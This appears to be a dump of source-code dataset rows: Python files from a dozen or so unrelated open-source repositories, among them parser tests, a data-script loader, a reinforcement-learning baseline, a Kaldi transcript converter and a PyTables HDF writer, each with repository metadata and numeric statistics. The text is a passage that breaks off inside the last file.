| 26.411765 | 74 | 0.675823 | 508 | 4,041 | 5.259843 | 0.293307 | 0.065868 | 0.022455 | 0.032934 | 0.259731 | 0.241766 | 0.241766 | 0.241766 | 0.225299 | 0.225299 | 0 | 0.002577 | 0.231873 | 4,041 | 152 | 75 | 26.585526 | 0.858247 | 0.286315 | 0 | 0.242718 | 0 | 0 | 0.111429 | 0.01 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038835 | false | 0 | 0.38835 | 0 | 0.485437 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
4620f61e29c562c8eee22b703bf2ebfcf3321f30 | 1,482 | py | Python | rnnparser/RecursiveNN/tests_npRNN/test_tree_utils.py | uphere-co/nlp-prototype | c4623927e5c5c5f9c3e702eb36497ea1d9fd1ff3 | [
"BSD-3-Clause"
] | null | null | null | rnnparser/RecursiveNN/tests_npRNN/test_tree_utils.py | uphere-co/nlp-prototype | c4623927e5c5c5f9c3e702eb36497ea1d9fd1ff3 | [
"BSD-3-Clause"
] | null | null | null | rnnparser/RecursiveNN/tests_npRNN/test_tree_utils.py | uphere-co/nlp-prototype | c4623927e5c5c5f9c3e702eb36497ea1d9fd1ff3 | [
"BSD-3-Clause"
] | null | null | null | import pytest
from npRNN.tree_utils import Node, NodeTree
def test_merge_results():
#sentence='I know a name of the cat on a hat'
sentence='a name of the cat on a hat'
words=[Node(word) for word in sentence.split()]
tree=NodeTree(words, [0, 5, 3, 1, 2, 0, 0])
assert tree.phrase.name =='(((a name) (of the)) ((cat on) (a hat)))'
assert tree.phrase.depth==3
assert tree.history == [0, 5, 3, 1, 2, 0, 0]
tree=NodeTree(words, [0, 5, 0, 0, 1, 1, 0])
assert tree.phrase.name =='((((a name) of) the) ((cat on) (a hat)))'
assert tree.phrase.depth==4
assert tree.history == [0, 5, 0, 0, 1, 1, 0]
tree=NodeTree(words, [2,0,3,2,2,0,0])
assert tree.phrase.name =='(((a name) (of the)) ((cat (on a)) hat))'
assert tree.phrase.depth==4
assert tree.history == [2,0,3,2,2,0,0]
def test_merge_dicrection():
sentence='a name of the cat on a hat'
words=[Node(word) for word in sentence.split()]
merge_history=[3,1,1,0,2,1,0]
all_nodes, _ =NodeTree.directed_merge(words,merge_history)
print all_nodes
composites=all_nodes[len(words):]
print composites
left_merged=NodeTree.get_merge_direction(composites)
expected_left_merged = [[True, False, False, True],[True, True, False, True],\
[True, False, True],[True, True],[True, False, False],[True, False],[True]]
assert left_merged == expected_left_merged
depths = [x.depth for x in composites]
assert depths==[1, 1, 2, 3, 1, 2, 4]
| 38 | 83 | 0.632928 | 251 | 1,482 | 3.657371 | 0.211155 | 0.098039 | 0.045752 | 0.065359 | 0.529412 | 0.436819 | 0.436819 | 0.398693 | 0.377996 | 0.377996 | 0 | 0.04958 | 0.197031 | 1,482 | 38 | 84 | 39 | 0.721849 | 0.02969 | 0 | 0.193548 | 0 | 0 | 0.119694 | 0 | 0 | 0 | 0 | 0 | 0.354839 | 0 | null | null | 0 | 0.064516 | null | null | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4621fb7b46924baa48b672c2c85f2d00296c68a8 | 1,267 | py | Python | pyrefine/script.py | jezcope/pyrefine | 44872592b1c0430d942d6901d7670e7b0ae77b11 | [
"MIT"
] | 27 | 2017-03-29T09:12:43.000Z | 2021-12-16T17:00:14.000Z | pyrefine/script.py | jezcope/pyrefine | 44872592b1c0430d942d6901d7670e7b0ae77b11 | [
"MIT"
] | 7 | 2017-04-02T22:10:22.000Z | 2021-06-01T21:25:26.000Z | pyrefine/script.py | jezcope/pyrefine | 44872592b1c0430d942d6901d7670e7b0ae77b11 | [
"MIT"
] | 2 | 2019-07-31T15:03:21.000Z | 2021-12-20T12:12:15.000Z | """A script is a series of operations."""
import json
import os
from .ops import create
class Script(object):
"""A script is a series of operations."""
def __init__(self, s=None):
"""Parse a script from a JSON string."""
if s is not None:
self.parsed_script = json.loads(s)
self.operations = [create(params)
for params in self.parsed_script]
def __len__(self):
"""Return the number of operations."""
return len(self.operations)
def execute(self, data):
"""Execute all operations on the provided dataset.
Args:
data (:class:`pandas.DataFrame`): The data to transform. Not
guaranteed immutable.
Returns:
:class:`pandas.DataFrame`: The transformed data.
"""
for op in self.operations:
data = op(data)
return data
def load_script(f):
"""Load and parse the script given.
Args:
f (:class:`file` or :class:`str`): Open file object or filename.
Returns:
:class:`Script`: The parsed script object.
"""
if isinstance(f, (str, os.PathLike)):
f = open(f)
with f:
return parse(f.read())
parse = Script
| 21.844828 | 72 | 0.566693 | 156 | 1,267 | 4.532051 | 0.391026 | 0.029703 | 0.02546 | 0.028289 | 0.079208 | 0.079208 | 0.079208 | 0 | 0 | 0 | 0 | 0 | 0.323599 | 1,267 | 57 | 73 | 22.22807 | 0.824971 | 0.40884 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.190476 | false | 0 | 0.142857 | 0 | 0.52381 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
46220a2b446c7a9b49f727a4d45bc84e233eea22 | 571 | py | Python | makeCourse/plastex/mhchem/__init__.py | dualspiral/makecourse | 96c0d3137b00a400df082f160eabf8a925953067 | [
"Apache-2.0"
] | null | null | null | makeCourse/plastex/mhchem/__init__.py | dualspiral/makecourse | 96c0d3137b00a400df082f160eabf8a925953067 | [
"Apache-2.0"
] | null | null | null | makeCourse/plastex/mhchem/__init__.py | dualspiral/makecourse | 96c0d3137b00a400df082f160eabf8a925953067 | [
"Apache-2.0"
] | null | null | null | from plasTeX import Command, Environment, sourceChildren
from plasTeX.Base.LaTeX import Math
from plasTeX.Base.TeX.Primitives import BoxCommand
# mhchem package - mostly handled by mathjax
# Overrive boxcommands inside MathJaX to avoid extra <script type="math/tex">
class MHBoxCommand(BoxCommand):
class math(Math.math):
@property
def source(self):
if self.hasChildNodes():
return u'$%s$' % sourceChildren(self)
return '$'
class ce(MHBoxCommand):
args = 'self'
class pu(MHBoxCommand):
args = 'self'
| 28.55 | 77 | 0.681261 | 66 | 571 | 5.893939 | 0.606061 | 0.084833 | 0.077121 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.224168 | 571 | 19 | 78 | 30.052632 | 0.878104 | 0.206655 | 0 | 0.142857 | 0 | 0 | 0.028889 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.214286 | 0 | 0.857143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4626daaa44d52cdbb1bec3a34b51700caf38c8dc | 448 | py | Python | tests/test_lamost_tools.py | igomezv/astroNN | 50af116f9cbfc684b63e7ddcf8829343a455722b | [
"MIT"
] | 156 | 2017-10-22T01:29:10.000Z | 2022-03-14T10:28:09.000Z | tests/test_lamost_tools.py | AbdulfattahBaalawi/astroNN | 0b970dd1a8d4d5e6d611ffa52cfd3c2ffdcb4643 | [
"MIT"
] | 16 | 2017-11-02T21:29:28.000Z | 2022-03-14T08:40:41.000Z | tests/test_lamost_tools.py | AbdulfattahBaalawi/astroNN | 0b970dd1a8d4d5e6d611ffa52cfd3c2ffdcb4643 | [
"MIT"
] | 46 | 2017-11-01T18:56:03.000Z | 2022-03-07T06:44:22.000Z | import unittest
import numpy as np
from astroNN.lamost import wavelength_solution, pseudo_continuum
class LamostToolsTestCase(unittest.TestCase):
def test_wavelength_solution(self):
wavelength_solution()
wavelength_solution(dr=5)
self.assertRaises(ValueError, wavelength_solution, dr=1)
def test_norm(self):
pseudo_continuum(np.ones(3909), np.ones(3909))
if __name__ == '__main__':
unittest.main()
| 23.578947 | 64 | 0.734375 | 53 | 448 | 5.886792 | 0.54717 | 0.288462 | 0.128205 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0271 | 0.176339 | 448 | 18 | 65 | 24.888889 | 0.818428 | 0 | 0 | 0 | 0 | 0 | 0.017857 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.166667 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
462c2089ebfd3afcf679c3d29b9f6e291acb4dc2 | 525 | py | Python | src/solutions/01.py | NNRepos/AoC-2021-python-solutions | 556ccc920b96cedbdc2f554a3bee28a793be4483 | [
"MIT"
] | null | null | null | src/solutions/01.py | NNRepos/AoC-2021-python-solutions | 556ccc920b96cedbdc2f554a3bee28a793be4483 | [
"MIT"
] | null | null | null | src/solutions/01.py | NNRepos/AoC-2021-python-solutions | 556ccc920b96cedbdc2f554a3bee28a793be4483 | [
"MIT"
] | null | null | null | from utils.utils import *
lines = get_input(__file__)
lines_as_nums = lines_to_nums(lines)
def part1(nums):
incr = 0
cur = nums[0]
for num in nums:
if num > cur:
incr += 1
cur = num
return incr
def part2():
nums = []
for i in range(len(lines_as_nums)):
if i < len(lines_as_nums) - 2:
nums.append(lines_as_nums[i] + lines_as_nums[i + 1] + lines_as_nums[i + 2])
return part1(nums)
print("part1:", part1(lines_as_nums))
print("part2:", part2())
| 19.444444 | 87 | 0.590476 | 82 | 525 | 3.52439 | 0.341463 | 0.16955 | 0.266436 | 0.124567 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034392 | 0.28 | 525 | 26 | 88 | 20.192308 | 0.730159 | 0 | 0 | 0 | 0 | 0 | 0.022857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.052632 | 0 | 0.263158 | 0.105263 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
462c4f9e4def6f4455874dce4f3095e44613b4b1 | 1,372 | py | Python | tensorforce/core/baselines/mlp_baseline.py | youlei202/tensorforce-lei | 871ef7f5c41d496aa8ad674854792ebd52ce1546 | [
"Apache-2.0"
] | 1 | 2019-12-21T03:31:33.000Z | 2019-12-21T03:31:33.000Z | tensorforce/core/baselines/mlp_baseline.py | youlei202/tensorforce-lei | 871ef7f5c41d496aa8ad674854792ebd52ce1546 | [
"Apache-2.0"
] | null | null | null | tensorforce/core/baselines/mlp_baseline.py | youlei202/tensorforce-lei | 871ef7f5c41d496aa8ad674854792ebd52ce1546 | [
"Apache-2.0"
] | 1 | 2019-12-21T03:31:39.000Z | 2019-12-21T03:31:39.000Z | # Copyright 2017 reinforce.io. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from tensorforce.core.baselines import NetworkBaseline
class MLPBaseline(NetworkBaseline):
"""
Multi-layer perceptron baseline (single-state) consisting of dense layers.
"""
def __init__(self, sizes, scope='mlp-baseline', summary_labels=()):
"""
Multi-layer perceptron baseline.
Args:
sizes: List of dense layer sizes
"""
layers_spec = []
for size in sizes:
layers_spec.append({'type': 'dense', 'size': size})
super(MLPBaseline, self).__init__(layers_spec, scope, summary_labels)
| 33.463415 | 80 | 0.671283 | 168 | 1,372 | 5.321429 | 0.613095 | 0.067114 | 0.053691 | 0.035794 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00724 | 0.194606 | 1,372 | 40 | 81 | 34.3 | 0.80181 | 0.585277 | 0 | 0 | 0 | 0 | 0.0499 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.4 | 0 | 0.6 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
4637594ad65e429cbd0184284c782da6df047d1a | 482 | py | Python | notifai_recruitment/api.py | BudzynskiMaciej/notifai_recruitment | 56860db3a2dad6115747a675895b8f7947e7e12e | [
"MIT"
] | null | null | null | notifai_recruitment/api.py | BudzynskiMaciej/notifai_recruitment | 56860db3a2dad6115747a675895b8f7947e7e12e | [
"MIT"
] | 2 | 2021-05-21T13:26:26.000Z | 2022-02-10T10:04:55.000Z | notifai_recruitment/api.py | BudzynskiMaciej/notifai_recruitment | 56860db3a2dad6115747a675895b8f7947e7e12e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""API routes config for notifai_recruitment project.
REST framework adds support for automatic URL routing to Django, and provides simple, quick and consistent
way of wiring view logic to a set of URLs.
For more information on this file, see
https://www.django-rest-framework.org/api-guide/routers/
"""
from rest_framework import routers
from textify.api.views import NoteViewSet
router = routers.DefaultRouter()
router.register(r'notes', NoteViewSet)
| 28.352941 | 106 | 0.778008 | 71 | 482 | 5.253521 | 0.746479 | 0.104558 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002392 | 0.13278 | 482 | 16 | 107 | 30.125 | 0.889952 | 0.665975 | 0 | 0 | 0 | 0 | 0.03268 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
4643409696cd3d49a508459df5a413ef73fb761e | 301 | py | Python | src/kol/request/CampgroundRestRequest.py | danheath/temppykol | 7f9621b44df9f9d2d9fc0a5b2a06db116b9ccfab | [
"BSD-3-Clause"
] | 19 | 2015-02-16T08:30:49.000Z | 2020-05-01T06:06:33.000Z | src/kol/request/CampgroundRestRequest.py | danheath/temppykol | 7f9621b44df9f9d2d9fc0a5b2a06db116b9ccfab | [
"BSD-3-Clause"
] | 5 | 2015-01-13T23:01:54.000Z | 2016-11-30T15:23:43.000Z | src/kol/request/CampgroundRestRequest.py | danheath/temppykol | 7f9621b44df9f9d2d9fc0a5b2a06db116b9ccfab | [
"BSD-3-Clause"
] | 19 | 2015-05-28T09:36:19.000Z | 2022-03-15T23:19:29.000Z | from kol.request.GenericRequest import GenericRequest
class CampgroundRestRequest(GenericRequest):
"Rests at the user's campground."
def __init__(self, session):
super(CampgroundRestRequest, self).__init__(session)
self.url = session.serverURL + 'campground.php?action=rest'
| 33.444444 | 67 | 0.750831 | 32 | 301 | 6.8125 | 0.71875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156146 | 301 | 8 | 68 | 37.625 | 0.858268 | 0.10299 | 0 | 0 | 0 | 0 | 0.189369 | 0.086379 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4643c3f57a3b1cef340d6b9803b645c83275e77f | 849 | py | Python | pdlearn/adaptor/methods.py | richlewis42/pandas-learn | 4330c642e4f62e8abc6dcd58ba33daf22519f41e | [
"MIT"
] | 1 | 2015-12-16T04:03:19.000Z | 2015-12-16T04:03:19.000Z | pdlearn/adaptor/methods.py | lewisacidic/pandas-learn | 4330c642e4f62e8abc6dcd58ba33daf22519f41e | [
"MIT"
] | 3 | 2015-12-10T02:05:13.000Z | 2015-12-16T04:04:16.000Z | pdlearn/adaptor/methods.py | lewisacidic/pandas-learn | 4330c642e4f62e8abc6dcd58ba33daf22519f41e | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of pandas-learn
# https://github.com/RichLewis42/pandas-learn
#
# Licensed under the MIT license:
# http://www.opensource.org/licenses/MIT
# Copyright (c) 2015, Rich Lewis <rl403@cam.ac.uk>
"""
pdlearn.adaptor.methods
~~~~~~~~~~~~~~~~~~~~~~~
Module implementing methods for pdlearn classes.
"""
import pandas as pd
def feature_property(name):
"""
Create a method adapting a parent class' property to return a pandas frame.
"""
# pylint: disable=C0111
@property
def method(self):
# pylint: disable=W0212
with self._unyouthanize():
prop = getattr(self, name + '_')
if self.pandas_mode_:
return pd.Series(prop, index=self.feature_names_, name=name)
else:
return prop
return method
| 22.945946 | 79 | 0.628975 | 106 | 849 | 4.971698 | 0.707547 | 0.041746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027523 | 0.229682 | 849 | 36 | 80 | 23.583333 | 0.778287 | 0.540636 | 0 | 0 | 0 | 0 | 0.002801 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
464a949d4e46e87b22e002325b18acfc9b8c6a90 | 592 | py | Python | src/storage-preview/azext_storage_preview/vendored_sdks/azure_storage/v2018_03_28/file/__init__.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | [
"MIT"
] | 207 | 2017-11-29T06:59:41.000Z | 2022-03-31T10:00:53.000Z | src/storage-preview/azext_storage_preview/vendored_sdks/azure_storage/v2018_03_28/file/__init__.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | [
"MIT"
] | 4,061 | 2017-10-27T23:19:56.000Z | 2022-03-31T23:18:30.000Z | src/storage-preview/azext_storage_preview/vendored_sdks/azure_storage/v2018_03_28/file/__init__.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | [
"MIT"
] | 802 | 2017-10-11T17:36:26.000Z | 2022-03-31T22:24:32.000Z | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from .fileservice import FileService
from .models import (
Share,
ShareProperties,
File,
FileProperties,
Directory,
DirectoryProperties,
FileRange,
ContentSettings,
CopyProperties,
SharePermissions,
FilePermissions,
DeleteSnapshot,
)
| 28.190476 | 76 | 0.540541 | 41 | 592 | 7.804878 | 0.853659 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163851 | 592 | 20 | 77 | 29.6 | 0.646465 | 0.505068 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.133333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
464bc6633efce25b9cc1abebeb497f50584d997d | 1,424 | py | Python | egs/cops/s5/local/text2json.py | Shuang777/kaldi-2016 | 5373fe4bd80857b53134db566cad48b8445cf3b9 | [
"Apache-2.0"
] | null | null | null | egs/cops/s5/local/text2json.py | Shuang777/kaldi-2016 | 5373fe4bd80857b53134db566cad48b8445cf3b9 | [
"Apache-2.0"
] | null | null | null | egs/cops/s5/local/text2json.py | Shuang777/kaldi-2016 | 5373fe4bd80857b53134db566cad48b8445cf3b9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import sys
import json
def sec2str(seconds):
sec_int = int(round(seconds))
hh = sec_int / 3600
mm = (sec_int - hh * 3600) / 60
ss = sec_int - hh * 3600 - mm * 60
return "%d:%02d:%02d" % (hh, mm, ss)
if len(sys.argv) != 4:
print "Usage:", __file__, "<segment> <text> <json>"
print " e.g.:", __file__, "data/dev/segmetns data/dev/text trans.json"
sys.exit(1)
segment_filename = sys.argv[1]
text_filename = sys.argv[2]
output_filename = sys.argv[3]
start_time = {}
end_time = {}
utt2chn = {}
utt2id = {}
with open(segment_filename) as segmentfile:
for line in segmentfile:
fields = line.split()
utt = fields[0]
start_time[utt] = float(fields[2]);
end_time[utt] = float(fields[3]);
id, chn = fields[1].split("_", 1)
utt2chn[utt] = chn
utt2id[utt] = id
data = {}
with open(text_filename) as textfile:
for line in textfile:
utt, text = line.split(" ", 1)
chn = utt2chn[utt]
if chn not in data:
data[chn] = {
'EmpID1': utt2id[utt],
'transcript': []
}
start = sec2str(start_time[utt])
end = sec2str(end_time[utt])
utt_info = {
'start': start,
'end': end,
'usable': True,
'speaker': 'OFFICER',
'utterance': text.strip()
}
data[chn]['transcript'].append(utt_info)
with open(output_filename, 'w') as outfile:
json.dump(data, outfile)
| 21.907692 | 72 | 0.589888 | 197 | 1,424 | 4.126904 | 0.385787 | 0.02952 | 0.055351 | 0.02952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038246 | 0.247191 | 1,424 | 64 | 73 | 22.25 | 0.720149 | 0.014045 | 0 | 0 | 0 | 0 | 0.110478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.04 | null | null | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46522be46094275849b7f3b3da9bf2d51591f8c8 | 10,754 | py | Python | contrib/make_hdf.py | scopatz/PyTables | 05a74def785688abd802224a5ba44393a701ebc7 | [
"BSD-3-Clause"
] | 9 | 2021-09-28T05:20:22.000Z | 2022-03-16T11:09:06.000Z | contrib/make_hdf.py | scopatz/PyTables | 05a74def785688abd802224a5ba44393a701ebc7 | [
"BSD-3-Clause"
] | null | null | null | contrib/make_hdf.py | scopatz/PyTables | 05a74def785688abd802224a5ba44393a701ebc7 | [
"BSD-3-Clause"
] | 9 | 2018-09-14T02:42:36.000Z | 2021-07-12T02:37:45.000Z | #!/usr/bin/env python
from __future__ import generators
import tables, cPickle, time
#################################################################################
def is_scalar(item):
    """Classify *item* for storage purposes.

    Returns 'str' for string-like objects, 'notstr' for non-iterable
    scalars (ints, floats, ...), and 0 for any other iterable
    (lists, dicts, ...).
    """
    try:
        iter(item)
    except TypeError:
        # not iterable at all -> plain scalar (e.g. int/float)
        return 'notstr'
    # iterable: strings are the only iterables that concatenate with ''
    try:
        item[:0] + ''  # check for string
        return 'str'
    except Exception:
        return 0
def is_dict(item):
    """Return 1 if *item* is dict-like (has iteritems/items), else 0."""
    try:
        item.iteritems()
        return 1
    except AttributeError:
        # Python 3 dicts have no iteritems(); fall back to items()
        return 1 if hasattr(item, 'items') else 0
def make_col(row_type, row_name, row_item, str_len):
    '''Add a PyTables column description for *row_name* to *row_type*.

    For strings the column is always at least 80 chars wide, or twice the
    max observed char size if that is larger.  *str_len* > 0 marks a string
    column; otherwise the column type is derived from type(row_item).
    '''
    # minimum string column width
    set_len=80
    if str_len:
        # widen to twice the longest observed string, if necessary
        if 2*str_len>set_len:
            set_len=2*str_len
        row_type[row_name]=tables.Col("CharType", set_len)
    else:
        # numeric columns: map Python type -> PyTables column type
        type_matrix={
            int: tables.Col("Int32", 1),
            float: tables.Col("Float32", 4), #Col("Int16", 1)
        }
        row_type[row_name]=type_matrix[type(row_item)]
def make_row(data):
    """Build a PyTables column-description dict for *data*.

    Supports three shapes: a scalar (column 'scalar'), a flat list
    (column 'col'), or a list of lists (columns 'col_0'..'col_N' plus
    'col_depth').  Deeper nesting raises ValueError.
    """
    row_type = {}
    scalar_type = is_scalar(data)
    if scalar_type:
        if scalar_type == 'str':
            make_col(row_type, 'scalar', data, len(data))
        else:
            make_col(row_type, 'scalar', data, 0)
    else:  # it is a list-like
        the_type = is_scalar(data[0])
        if the_type == 'str':
            make_col(row_type, 'col', data[0], _max_item_len(data))
        elif the_type:
            make_col(row_type, 'col', data[0], 0)
        else:  # list within the list, make many columns
            make_col(row_type, 'col_depth', 0, 0)
            for count, col in enumerate(data):
                the_type = is_scalar(col[0])
                if the_type == 'str':
                    # BUGFIX: measure the strings of *this* column; the
                    # original scanned the outer list of columns instead.
                    make_col(row_type, 'col_' + str(count), col[0],
                             _max_item_len(col))
                elif the_type:
                    make_col(row_type, 'col_' + str(count), col[0], 0)
                else:
                    raise ValueError('too many nested levels of lists')
    return row_type

def _max_item_len(items):
    """Length of the longest element in *items*."""
    the_max = 0
    for i in items:
        if len(i) > the_max:
            the_max = len(i)
    return the_max
def add_table(fileh, group_obj, data, table_name):
    """Create a compressed table named *table_name* under *group_obj* and
    fill it with *data* (a scalar, a flat list, or a list of lists)."""
    #figure out if it is a list of lists or a single list
    #get types of columns
    row_type=make_row(data)
    table1=fileh.createTable(group_obj, table_name, row_type, 'H', compress=1)
    row=table1.row
    if is_scalar(data):
        # single value stored in the 'scalar' column
        row['scalar']=data
        row.append()
    else:
        if is_scalar(data[0]):
            # flat list: one row per element in the 'col' column
            for i in data:
                row['col']=i
                row.append()
        else:
            # list of lists: write column by column; 'col_depth' records
            # each column's length so it can be reassembled on read
            count=0
            for col in data:
                row['col_depth']=len(col)
                for the_row in col:
                    if is_scalar(the_row):
                        row['col_'+str(count)]=the_row
                        row.append()
                    else:
                        raise ValueError('too many levels of lists')
                count+=1
    table1.flush()
def add_cache(fileh, cache):
    """Pickle the directory *cache* and store it as 8000-char rows in
    table 'cache0' of group 'pytables_cache_v0' (read by Hdf_dict)."""
    group_name='pytables_cache_v0';table_name='cache0'
    root=fileh.root
    group_obj=fileh.createGroup(root, group_name)
    # protocol-0 pickle is text; newlines are swapped for chr(1) so the
    # payload survives storage in a CharType column
    cache_str=cPickle.dumps(cache, 0)
    cache_str=cache_str.replace('\n', chr(1))
    cache_pieces=[]
    while cache_str:
        # split the pickle into 8000-byte chunks, one table row each
        cache_part=cache_str[:8000];cache_str=cache_str[8000:]
        if cache_part:
            cache_pieces.append(cache_part)
    row_type={}
    row_type['col_0']=tables.Col("CharType", 8000)
    #
    table_cache=fileh.createTable(group_obj, table_name, row_type, 'H', compress =1)
    for piece in cache_pieces:
        print len(piece)
        table_cache.row['col_0']=piece
        table_cache.row.append()
    table_cache.flush()
def save2(hdf_file, data):
    """Write the nested dict *data* into *hdf_file*.

    Dicts become HDF groups, leaf values become tables (via add_table),
    and the directory structure is pickled into a cache group so that
    Hdf_dict can reload it quickly without walking the file.
    """
    fileh=tables.openFile(hdf_file, mode='w', title='logon history')
    root=fileh.root;cache_root=cache={}
    root_path=root._v_pathname;root=0
    # iterative depth-first walk over the nested dict
    stack = [ (root_path, data, cache) ]
    table_num=0
    count=0
    while stack:
        (group_obj_path, data, cache)=stack.pop()
        #data='wilma':{'mother':[22,23,24]}}
        #grp_name wilma
        for grp_name in data:
            #print 'fileh=',fileh
            count+=1
            cache[grp_name]={}
            new_group_obj=fileh.createGroup(group_obj_path, grp_name)
            #print 'path=',new_group_obj._v_pathname
            new_path=new_group_obj._v_pathname
            #if dict, you have a bunch of groups
            if is_dict(data[grp_name]):#{'mother':[22,23,24]}
                stack.append((new_path, data[grp_name], cache[grp_name]))
            #you have a table
            else:
                #data[grp_name]=[110,130,140],[1,2,3]
                add_table(fileh, new_path, data[grp_name], 'tbl_'+str(table_num))
                table_num+=1
    #fileh=tables.openFile(hdf_file,mode='a',title='logon history')
